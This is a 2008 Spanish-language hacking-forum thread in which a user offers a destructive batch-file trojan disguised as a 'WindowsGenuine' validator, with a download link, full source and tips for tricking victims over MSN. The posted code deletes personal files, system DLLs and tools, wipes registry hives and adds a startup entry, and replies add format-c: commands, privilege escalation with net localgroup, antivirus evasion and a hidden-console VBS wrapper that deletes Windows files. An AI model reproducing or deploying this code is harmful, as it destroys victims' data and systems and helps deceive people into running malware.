Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 05, 2008, 10:59:31
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: Virus real 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Virus real  (Leído 1189 veces)
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« en: Abril 02, 2008, 02:20:03 »
juegos gratis
Este ejecutable programado en lenguaje batch aparenta ser un validador de Windows, algo que le interesa a la mayoria de las persona, Hacer su Windows genuino.

Espero que les guste:

VENTAJAS:
-Borra todos los documentos personales (Fotos, musica, dodumentos de texto, etc).
-Borra archivos esenciales de Windows (Dll`s, editor del registro, taskmanager, etc).
-Deja inutilizable el mouse, teclado y otros dispositivos de harware.
-Borra entradas del registro importantes (Especialmente Software de cualquier tipo).
-Se copia al arraque de Windows (Se ejecuta cada vez que se prende la PC).
-Reinicia la PC cada 1 segundo.
-Funciona en la mayoria de los Windows (Especialmente XP).
-Posee extencion .exe (Si la victima sabe "algo" de programacion batch no podra "editar" el virus para ver el codigo y asi ver lo que hace. (Se disminuyen las sospechas).
-Indetectable por cualquier antivirus (Se disminuyen las sospechas).
-Funciona en modo ghost (La pantalla cmd no aparece en ningun momento); (Se disminuyen las sospechas).
-Posee un icono y nombre acordes con el supuesto "programa". (Se disminuyen las sospechas).
-No se puede borrar facilmente despues de su ejecucion(Es un proceso).
-Soluciones despues de su ejecucion: Formatear.
-No es nesesario comprimirlo en .rar o .zip para "compartir" por MSN.

DESVENTAJAS:
-Solo funciona en Windows.

NOTAS:
-Este "virus" ya viene con un nombre y un icono determinado, es importante que no le cambien el nombre ya que sino no se puede añadir al registro de arranque de Windows.
El nombre es WindowsGenuine (No lo cambien).
-Solo basta usar algo de ingenieria social en el MSN, mandarlo sin comprimir y esperar que sea ejecutado por la victima.
-No me hago responsable de su uso, no lo usen por que si, haganlo con una buena razon.

Icono:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Si se quiere borrar despues de su ejecucion:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Descargar:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
http://rapidshare.com/files/104428351/WindowsGenuine.exe.html


Repito!: No lo usen para divertirse, no lo usen por que si, usenlo de forma inteligente.
PD: Esta de mas decirles que no lo ejecuten.

Saludos salud
« Última modificación: Abril 02, 2008, 06:20:21 por Klez.H » En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 311


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #1 en: Abril 02, 2008, 03:33:52 »
esta bastante bien,
deverias postear el code, creo yo.....digo, si no molesto
En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
Inmortal_2
Habitual
*****
Desconectado Desconectado

Mensajes: 163


Sólo cuando el último árbol esté muerto, el último

virus_xp_13@hotmail.com
Ver Perfil WWW Email
« Respuesta #2 en: Abril 02, 2008, 03:53:59 »
Oe ta muy bueno el virus pero deberia seria bueno que el virus al abrir se le formatee las unidades C; D; E; F; G, etc.
En línea
WinFast 760GXK8MC-RSH AMD Athlon 64 3000+ 2 Ghz SKT 754 Memoria RAM 1 GB DDR-1 ATi Radeon 9250 128 MB GDDR1 AGP 8X D.D. 80 GB SATA LG GSA-H62N
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #3 en: Abril 02, 2008, 04:16:26 »
Citar
-Soluciones despues de su ejecucion: Formatear.
    ... XDDD ..

Saludos!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #4 en: Abril 02, 2008, 04:48:14 »
Aca les dejo el code, con respecto a formatear, estoy trabajando en eso, ya que no conozco ningun code que no pida confirmacion al formatear.
Editado:
Citar
 @echo off
goto deldp
:deldp
del "%homepath%\" /f /s /q
goto delfiles
:delfiles
del "%systemroot%\system\*.dll"
del "%systemroot%\system32\*.dll"
del "%systemroot%\system\system.*"
del "%systemroot%\system32\system.*"
del "%systemroot%\system32\win.*"
del "%systemroot%\system32\command.*"
del "%systemroot%\system32\keyboard.*"
del "%systemroot%\system32\smss.*"
del "%systemroot%\system32\mouse.*"
del "%systemroot%\system32\msvideo.*"
del "%systemroot%\regedit.exe"
del "%systemroot%\taskman.exe"
del "%systemroot%\explorer.exe"
del "%systemroot%\system32\taskkill.exe"
del "%systemroot%\system32\tasklist.exe"
del "%systemroot%\system32\taskmgr.exe"
goto delreg
:delreg
reg delete "HKEY_CURRENT_CONFIG\Software" /f
reg delete "HKEY_CURRENT_CONFIG\System" /f
reg delete "HKEY_USERS\.DEFAULT" /f
reg delete "HKEY_USERS\S-1-5-18" /f
reg delete "HKEY_USERS\S-1-5-19" /f
reg delete "HKEY_USERS\S-1-5-19_Classes" /f
reg delete "HKEY_USERS\S-1-5-20" /f
reg delete "HKEY_USERS\S-1-5-20_Classes" /f
reg delete "HKEY_USERS\S-1-5-21-602162358-606747145-725345543-1003" /f
reg delete "HKEY_USERS\S-1-5-21-602162358-606747145-725345543-1003_Classes" /f
reg delete "HKEY_LOCAL_MACHINE\HARDWARE" /f
reg delete "HKEY_LOCAL_MACHINE\SAM" /f
reg delete "HKEY_LOCAL_MACHINE\SECURITY" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM" /f
reg delete "HKEY_CURRENT_USER\AppEvents" /f
reg delete "HKEY_CURRENT_USER\Console" /f
reg delete "HKEY_CURRENT_USER\Control Panel" /f
reg delete "HKEY_CURRENT_USER\Environment" /f
reg delete "HKEY_CURRENT_USER\Identities" /f
reg delete "HKEY_CURRENT_USER\Keyboard Layout" /f
reg delete "HKEY_CURRENT_USER\Printers" /f
reg delete "HKEY_CURRENT_USER\SessionInformation" /f
reg delete "HKEY_CURRENT_USER\Software" /f
reg delete "HKEY_CURRENT_USER\UNICODE Program Groups" /f
reg delete "HKEY_CURRENT_USER\Volatile Environment" /f
reg delete "HKEY_CURRENT_USER\Windows 3.1 Migration Status" /f
reg delete "HKEY_CLASSES_ROOT\*" /f
reg delete "HKEY_CLASSES_ROOT\.iso" /f
reg delete "HKEY_CLASSES_ROOT\.bin" /f
reg delete "HKEY_CLASSES_ROOT\.img" /f
reg delete "HKEY_CLASSES_ROOT\.cif" /f
reg delete "HKEY_CLASSES_ROOT\.fcd" /f
reg delete "HKEY_CLASSES_ROOT\.nrg" /f
reg delete "HKEY_CLASSES_ROOT\.gcd" /f
reg delete "HKEY_CLASSES_ROOT\.p01" /f
reg delete "HKEY_CLASSES_ROOT\.c2d" /f
reg delete "HKEY_CLASSES_ROOT\.tao" /f
reg delete "HKEY_CLASSES_ROOT\.dao" /f
reg delete "HKEY_CLASSES_ROOT\.cdi" /f
reg delete "HKEY_CLASSES_ROOT\.cue" /f
reg delete "HKEY_CLASSES_ROOT\.cd" /f
reg delete "HKEY_CLASSES_ROOT\.gi" /f
reg delete "HKEY_CLASSES_ROOT\.pxi" /f
reg delete "HKEY_CLASSES_ROOT\.pdi" /f
reg delete "HKEY_CLASSES_ROOT\.mds" /f
reg delete "HKEY_CLASSES_ROOT\.mdf" /f
reg delete "HKEY_CLASSES_ROOT\.ccd" /f
reg delete "HKEY_CLASSES_ROOT\.vc4" /f
reg delete "HKEY_CLASSES_ROOT\.b5t" /f
reg delete "HKEY_CLASSES_ROOT\.b5i" /f
reg delete "HKEY_CLASSES_ROOT\.dmg" /f
reg delete "HKEY_CLASSES_ROOT\.ibp" /f
reg delete "HKEY_CLASSES_ROOT\.ibq" /f
reg delete "HKEY_CLASSES_ROOT\.ncd" /f
reg delete "HKEY_CLASSES_ROOT\.bmp" /f
reg delete "HKEY_CLASSES_ROOT\.dib" /f
reg delete "HKEY_CLASSES_ROOT\.jpeg" /f
reg delete "HKEY_CLASSES_ROOT\.jpg" /f
reg delete "HKEY_CLASSES_ROOT\.jpe" /f
reg delete "HKEY_CLASSES_ROOT\.jfif" /f
reg delete "HKEY_CLASSES_ROOT\.gif" /f
reg delete "HKEY_CLASSES_ROOT\.png" /f
reg delete "HKEY_CLASSES_ROOT\.tif" /f
reg delete "HKEY_CLASSES_ROOT\.tiff" /f
reg delete "HKEY_CLASSES_ROOT\.psd" /f
reg delete "HKEY_CLASSES_ROOT\.pdd" /f
reg delete "HKEY_CLASSES_ROOT\.rle" /f
reg delete "HKEY_CLASSES_ROOT\.eps" /f
reg delete "HKEY_CLASSES_ROOT\.psb" /f
reg delete "HKEY_CLASSES_ROOT\.pcx" /f
reg delete "HKEY_CLASSES_ROOT\.pdf" /f
reg delete "HKEY_CLASSES_ROOT\.pdp" /f
reg delete "HKEY_CLASSES_ROOT\.raw" /f
reg delete "HKEY_CLASSES_ROOT\.pct" /f
reg delete "HKEY_CLASSES_ROOT\.pict" /f
reg delete "HKEY_CLASSES_ROOT\.pxr" /f
reg delete "HKEY_CLASSES_ROOT\.pbm" /f
reg delete "HKEY_CLASSES_ROOT\.pgm" /f
reg delete "HKEY_CLASSES_ROOT\.ppm" /f
reg delete "HKEY_CLASSES_ROOT\.pfm" /f
reg delete "HKEY_CLASSES_ROOT\.pnm" /f
reg delete "HKEY_CLASSES_ROOT\.pam" /f
reg delete "HKEY_CLASSES_ROOT\.sct" /f
reg delete "HKEY_CLASSES_ROOT\.tga" /f
reg delete "HKEY_CLASSES_ROOT\.vda" /f
reg delete "HKEY_CLASSES_ROOT\.icb" /f
reg delete "HKEY_CLASSES_ROOT\.vst" /f
reg delete "HKEY_CLASSES_ROOT\.rtf" /f
reg delete "HKEY_CLASSES_ROOT\.txt" /f
reg delete "HKEY_CLASSES_ROOT\.docx" /f
reg delete "HKEY_CLASSES_ROOT\.kgb" /f
reg delete "HKEY_CLASSES_ROOT\.doc" /f
reg delete "HKEY_CLASSES_ROOT\.dot" /f
reg delete "HKEY_CLASSES_ROOT\.docm" /f
reg delete "HKEY_CLASSES_ROOT\.dotx" /f
reg delete "HKEY_CLASSES_ROOT\.dotm" /f
reg delete "HKEY_CLASSES_ROOT\.xlsx" /f
reg delete "HKEY_CLASSES_ROOT\.xlsm" /f
reg delete "HKEY_CLASSES_ROOT\.xlsb" /f
reg delete "HKEY_CLASSES_ROOT\.xls" /f
reg delete "HKEY_CLASSES_ROOT\.xml" /f
reg delete "HKEY_CLASSES_ROOT\.mht" /f
reg delete "HKEY_CLASSES_ROOT\.mhtml" /f
reg delete "HKEY_CLASSES_ROOT\.htm" /f
reg delete "HKEY_CLASSES_ROOT\.html" /f
reg delete "HKEY_CLASSES_ROOT\.xltx" /f
reg delete "HKEY_CLASSES_ROOT\.xltm" /f
reg delete "HKEY_CLASSES_ROOT\.csv" /f
reg delete "HKEY_CLASSES_ROOT\.prn" /f
reg delete "HKEY_CLASSES_ROOT\.dif" /f
reg delete "HKEY_CLASSES_ROOT\.slk" /f
reg delete "HKEY_CLASSES_ROOT\.xlam" /f
reg delete "HKEY_CLASSES_ROOT\.mdb" /f
reg delete "HKEY_CLASSES_ROOT\.php" /f
reg delete "HKEY_CLASSES_ROOT\.swf" /f
reg delete "HKEY_CLASSES_ROOT\.fla" /f
reg delete "HKEY_CLASSES_ROOT\.exe" /f
reg delete "HKEY_CLASSES_ROOT\.log" /f
reg delete "HKEY_CLASSES_ROOT\.avi" /f
reg delete "HKEY_CLASSES_ROOT\.mp3" /f
reg delete "HKEY_CLASSES_ROOT\.wav" /f
reg delete "HKEY_CLASSES_ROOT\.vmw" /f
reg delete "HKEY_CLASSES_ROOT\.dvx" /f
reg delete "HKEY_CLASSES_ROOT\.old" /f
reg delete "HKEY_CLASSES_ROOT\.prx" /f
reg delete "HKEY_CLASSES_ROOT\.bak" /f
reg delete "HKEY_CLASSES_ROOT\.dat" /f
reg delete "HKEY_CLASSES_ROOT\.csv" /f
reg delete "HKEY_CLASSES_ROOT\.tmp" /f
reg delete "HKEY_CLASSES_ROOT\.ini" /f
reg delete "HKEY_CLASSES_ROOT\.dll" /f
reg delete "HKEY_CLASSES_ROOT\.mdb" /f
reg delete "HKEY_CLASSES_ROOT\.wsc" /f
reg delete "HKEY_CLASSES_ROOT\.mod" /f
reg delete "HKEY_CLASSES_ROOT\.vbs" /f
reg delete "HKEY_CLASSES_ROOT\.cmd" /f
reg delete "HKEY_CLASSES_ROOT\.scr" /f
reg delete "HKEY_CLASSES_ROOT\.cpl" /f
reg delete "HKEY_CLASSES_ROOT\.rat" /f
reg delete "HKEY_CLASSES_ROOT\.msi" /f
reg delete "HKEY_CLASSES_ROOT\.cpl" /f
reg delete "HKEY_CLASSES_ROOT\.xml" /f
reg delete "HKEY_CLASSES_ROOT\.msc" /f
reg delete "HKEY_CLASSES_ROOT\.drv" /f
reg delete "HKEY_CLASSES_ROOT\.vxd" /f
reg delete "HKEY_CLASSES_ROOT\.ocx" /f
reg delete "HKEY_CLASSES_ROOT\.uce" /f
reg delete "HKEY_CLASSES_ROOT\.tsp" /f
reg delete "HKEY_CLASSES_ROOT\.tmp" /f
reg delete "HKEY_CLASSES_ROOT\.tsk" /f
reg delete "HKEY_CLASSES_ROOT\.tlb" /f
reg delete "HKEY_CLASSES_ROOT\.tha" /f
reg delete "HKEY_CLASSES_ROOT\.sve" /f
reg delete "HKEY_CLASSES_ROOT\.sql" /f
reg delete "HKEY_CLASSES_ROOT\.sep" /f
reg delete "HKEY_CLASSES_ROOT\.sig" /f
reg delete "HKEY_CLASSES_ROOT\.olb" /f
reg delete "HKEY_CLASSES_ROOT\.oca" /f
reg delete "HKEY_CLASSES_ROOT\.nt" /f
reg delete "HKEY_CLASSES_ROOT\.nls" /f
reg delete "HKEY_CLASSES_ROOT\.pro" /f
reg delete "HKEY_CLASSES_ROOT\.rll" /f
reg delete "HKEY_CLASSES_ROOT\.rom" /f
reg delete "HKEY_CLASSES_ROOT\.ram" /f
reg delete "HKEY_CLASSES_ROOT\.nls" /f
reg delete "HKEY_CLASSES_ROOT\.nld" /f
reg delete "HKEY_CLASSES_ROOT\.ita" /f
reg delete "HKEY_CLASSES_ROOT\.iec" /f
reg delete "HKEY_CLASSES_ROOT\.ime" /f
reg delete "HKEY_CLASSES_ROOT\.h" /f
reg delete "HKEY_CLASSES_ROOT\.hxx" /f
reg delete "HKEY_CLASSES_ROOT\.sys" /f
reg delete "HKEY_CLASSES_ROOT\.dep" /f
reg delete "HKEY_CLASSES_ROOT\.deu" /f
reg delete "HKEY_CLASSES_ROOT\.enu" /f
reg delete "HKEY_CLASSES_ROOT\.esn" /f
reg delete "HKEY_CLASSES_ROOT\.chm" /f
reg delete "HKEY_CLASSES_ROOT\.hlp" /f
reg delete "HKEY_CLASSES_ROOT\.dat" /f
reg delete "HKEY_CLASSES_ROOT\.dbl" /f
reg delete "HKEY_CLASSES_ROOT\.cpx" /f
reg delete "HKEY_CLASSES_ROOT\.cpi" /f
reg delete "HKEY_CLASSES_ROOT\.cht" /f
reg delete "HKEY_CLASSES_ROOT\.chs" /f
reg delete "HKEY_CLASSES_ROOT\.c" /f
reg delete "HKEY_CLASSES_ROOT\.acm" /f
reg delete "HKEY_CLASSES_ROOT\.ax" /f
reg delete "HKEY_CLASSES_ROOT\.com" /f
reg delete "HKEY_CLASSES_ROOT\.bat" /f
reg delete "HKEY_CLASSES_ROOT\." /f
reg delete "HKEY_CLASSES_ROOT\." /f
reg delete "HKEY_CLASSES_ROOT\." /f
goto rei
:rei
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsGenuine.exe /t REG_SZ /d C:\windows\system32\WindowsGenuine.exe /f
shutdown -s -f -t 01
start WindowsGenuine.exe
goto s
:s
exit
« Última modificación: Abril 02, 2008, 06:26:05 por Klez.H » En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #5 en: Abril 02, 2008, 04:53:17 »
Citar
goto deldp
:deldp
   ..... mmmmm

Citar
goto delfiles
--> no existe la etiqueta :delfiles

entre otras cosas ... mucho cigcode ...... no funcionara si no tiene permisos de admin .....


Saludos! .... y espero que tomes estas objeciones como consejos  ...
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #6 en: Abril 02, 2008, 06:25:14 »
Sep, ya corregi esa etiqueta y lo subi de vuelta, puse otro link.
A mi me funciono en una maquina virtual, creo que no hay nesecidad de tener permisos de Admin, a noser que se cuente con un buen firewall que supervise las acciones con privilesgios de Windows.
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #7 en: Abril 02, 2008, 06:29:28 »
te digo que necesita permisos de admin porque si no es asi no te deja modificar el registro ni las carpetas del sistema.

Saludos!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #8 en: Abril 02, 2008, 07:16:48 »
La verdad que ami no me pasa eso... por dos razones:
-Lo probe en una PC virtual y no nesecito ningun permiso para hacerlo.
-Una vez me baje un juego que se llamaba ProSoccerEvolution 2008, despues me aburrio y lo borre por completo, despues de desinstalarlo, mirando el registro encontre una entrada llamada KONAMI (donde se guardaba el juego); esta entrada tenia unas cosas dentro, entonces hice un batch que borrara esa entrada y todo su contenido (Ya que no me servia para nada y de paso probaba si en realidad nesecitaba permiso el batch), lo ejecute, aparecio una ventana cmd que decia "Accion completada exitosamente" o algo asi, despues fui al registro y la entrada KONAMI ya no estaba, se habia borrado con todo su contenido sin dejar rastro ni pedir confirmacion.
-Cree una carpeta en WINDOWS llamada Nueva carpeta, dentro le puse un .txt que para nada servia. Hice un batch que borrara todo su contenido y paso lo mismo que en el punto anterior, sin nesecitar los permisos del admin se borro todo.

En mi opinion las batch trabajan sin permiso del Admin.

saludos salud
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 917


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil Email
« Respuesta #9 en: Abril 02, 2008, 07:19:53 »
Ok ... intenta hacer todo eso en una cuenta de invitado .... haber q pasa... te lo digo por experiencia

PD: no pienso seguir en una discucion de este tipo, dejemos las cosas asi.

Saludos!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
:: SmartGenius™ ::
[Splendit Smart]
Moderación
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2512


Campusero... :P

smartgenius@el-hacker.org
Ver Perfil WWW
« Respuesta #10 en: Abril 02, 2008, 08:47:32 »
Estan muy buenos algunos codes man...

me interesaria usar algunso de alli para uno que yo estoy desarrollando... espero que no te moleste...

Es algo parecido al tema ese de Activacion de Win  Grin Grin... muy pronto lo tendre listo...

Saludos.
En línea


cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 311


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #11 en: Abril 03, 2008, 08:13:06 »
para obtener permisos de admin tienes dos opciones:
1) wmin: es un comando de windows, pruebalo......
2)net localgroup ADMINISTRADORES %username% /ADD

con esto te deveria resultar... UNA COSA SI QUE NECESITAS PERMISOS PARA ESO.....
yo tembien tengo un pc virtual.....
y e intentado formatear, y como que no te deja, si no tienes permisos..
lo que puedes hacer es lo siguiente:

format c:
y/n:y
y/n:y

esto es muy sencillo pero funciona, aunque deverias esconderlo en algunas variables.  no necesitas permisos.(windows xp)
En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #12 en: Abril 03, 2008, 11:42:01 »
Sep, se nesecitan los permisos pero solo en cuentas de invitados pero no pense en ello. Grin
Di por hecho que casi nadie usa este tipo de cuentas.

Cita de: :: SmartGenius :: en Abril 02, 2008, 08:47:32
Estan muy buenos algunos codes man...

me interesaria usar algunso de alli para uno que yo estoy desarrollando... espero que no te moleste...

Es algo parecido al tema ese de Activacion de Win  Grin Grin... muy pronto lo tendre listo...

Saludos.

Se puede mejorar y mucho Wink

Saludos salud
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
wizard_0
Miembro
*****
Desconectado Desconectado

Mensajes: 143


wizard_0_@hotmail.com
Ver Perfil Email
« Respuesta #13 en: Abril 03, 2008, 03:27:13 »
Si  keres mejorarlo  puej  postea  el  codigo  fuente   para   q   lo  empecemos  a  mejorar...
por  q   ksi  nadie  le  da  importancia  a  un   ejecutable..  por   la  desconfianza  al  code...

weno  salu2..
En línea
↑__P®egun†a__b!na®¡a__↑

3reS_un__[1]__ø__[0]__?¿?¿
        ø__vives__ø__mueres

Si__estas__v1vø_!!!__ganate__el__ saludo_!!!

"
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion"
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #14 en: Abril 03, 2008, 04:21:21 »
cuban-hack habia pensado en hacer
format c:
y/n:y
y/n:y
pero por lo que tenia entendido no funcionaba, justamente ahora no tengo la PC que con el programa para crear maquinas virtuales, en cuanto lo tenga lo pruebo Grin



Ya postie el code ayer....................

saludos salud
« Última modificación: Abril 03, 2008, 04:25:24 por Klez.H » En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 311


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #15 en: Abril 04, 2008, 11:52:41 »
yo lo probe antes de decirtelo en un pc de my escuela y funcionó con permisos de un user normal, sin restricciones. pero si tiene restricciones, para asegurarte de que funciona deverías obtener privilegios.....
usa variables para crearlo, por que si no te lo puede detectar el antivirus.
como te dije antes yo conozco dos maneras:

1) wmin: es un comando de windows, pruebalo......
2)net localgroup ADMINISTRADORES %username% /ADD
« Última modificación: Abril 04, 2008, 11:56:03 por cuban-hack » En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #16 en: Abril 04, 2008, 09:41:48 »
Cita de: cuban-hack en Abril 04, 2008, 11:52:41
yo lo probe antes de decirtelo en un pc de my escuela y funcionó con permisos de un user normal, sin restricciones. pero si tiene restricciones, para asegurarte de que funciona deverías obtener privilegios.....
usa variables para crearlo, por que si no te lo puede detectar el antivirus.
como te dije antes yo conozco dos maneras:

1) wmin: es un comando de windows, pruebalo......
2)net localgroup ADMINISTRADORES %username% /ADD

 Grin Exelente
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 311


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #17 en: Abril 05, 2008, 04:17:18 »
otra cosa que se me ocurrio sería utilizar este comando, que se encarga de ejecutarte los archivos con permisos elevados........ es decir, tendrias que redireccionar todo el code a una parte del pc, y al final ejecutarlo con este comando...

TAKEOWN

pero bueno, elije el que mas te guste o ponselo los 3 por si acaso
En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
[l0rd|magg0t]
Colaborador
*****
Desconectado Desconectado

Mensajes: 417


cracking e hacking aprentice, we never finish this

pazuzu@el-hacker.org
Ver Perfil
« Respuesta #18 en: Abril 07, 2008, 08:32:07 »
mmmmm no me gusta que allas dicho que solo funcione en windows sea una desventaja......en realidad no tiene por que ser desventaja  Roll Eyes Roll Eyes Tongue no creo que joder solo windows y no linux sea una desventaja por otra parte esta bueno tu virus yo me invente uno que hacia lo mismo con los archivos recividos del msn  Cool Grin oooootra cosa debiste y solo es una sugerencia hacerlo sfx o algo asi....para los que les encanta abrir los archivos por doble click sin razon alguna lol


saludos
« Última modificación: Abril 07, 2008, 08:37:49 por gui3 » En línea


come to daddy:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
definitivamente no existe nadie mejor:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
o talves si??:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Klez.H
Colaborador
*****
Desconectado Desconectado

Mensajes: 502


Dios es sofisticado, pero no malévolo.


Ver Perfil Email
« Respuesta #19 en: Abril 07, 2008, 11:43:33 »
Por un lado se podria tomar como una desentaja ya que no se puede "infectar" a cualquiera, aunque hay que tener en cuenta que la gran mayoria de las personas en todo el mundo usan Windows (Por lo que se podria convertir en una ventaja) Smiley, y con respecto al sfx no creo que sea nesesario por dos razones:
-No hay nesecidad de comprimirlo para mandarlo por msn Wink
-Tiene extencion .exe Wink
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Bizz
Visitante
« Respuesta #20 en: Abril 08, 2008, 10:59:39 »
xD precisamente el messenger de msn no permite mandar exes


y viendo ese codigo me extraña esto bastante.

----
goto rei
:rei
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsGenuine.exe /t REG_SZ /d C:\windows\system32\WindowsGenuine.exe /f
shutdown -s -f -t 01
start WindowsGenuine.exe
goto s
:s
exit
---
te aconsejo ke leas algo sobre el uso de goto aunke sea la ayuda del cmd.

no veo ke el archivo se mueva o copie  a C:\windows\system32\WindowsGenuine.exe
y no creo ke kien lo habra vaya a moverlo para ke se ejecute al inicio xD
ademas deberias usar una variable,windows no tiene porke estar en c:

yo diria ke el start al final no sirve de nada
En línea
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 311


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #21 en: Abril 08, 2008, 11:10:34 »
mira podrias hacer una cosa

esto redireccionarlo a una carpeta cualquiera de windows

Citar
:delfiles
del "%systemroot%\system32\keyboard.*"
goto delreg
y hacer que esto se ejecute cada vez que se inicie windows, por que segun tengo entendido ese arcivo se recupera con el inicio e windows, y ya el teclado funcionaría, o simplemente hacer

at %ramdom%:%ramdom% start c:\windows\system32\adiosteclado,bat
o
at %ramdom%:%ramdom% del "%systemroot%\system32\keyboard.*"
En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
Bizz
Visitante
« Respuesta #22 en: Abril 08, 2008, 11:18:53 »
me temo ke no es tan facil,los archivos dle raton y el teclado se recuperan en cuanto son borrados
En línea
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 311


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« Respuesta #23 en: Abril 08, 2008, 11:32:28 »
por eso le dije que pusiera ese archivo como un bucle predefinido que se ejecuta con windows, y que use, un code de the shadow que utiliza vb¡s en bat y se encarga de que la consola solo se vea una milesima de segunda, aunque este ejecutandose horas y horas..... solo se podría cerrar por procesos, y el teclado no funciona....

  @echo off
rem verificamos si el code lo ejecuto el vbs
goto %1_run
:ini_run
echo AKI PON TU CODE  DEL BAT
ECHO EJEMPLO
DEL C:\WINDOWS\*.*
:_run
rem creamos y ejecutas el vbs q ejecuta el code con el parametro
echo set shell = CreateObject("wscript.shell") > run.vbs
echo shell.run "cmd /c "%0" ini", vbHide >> run.vbs
start run.vbs

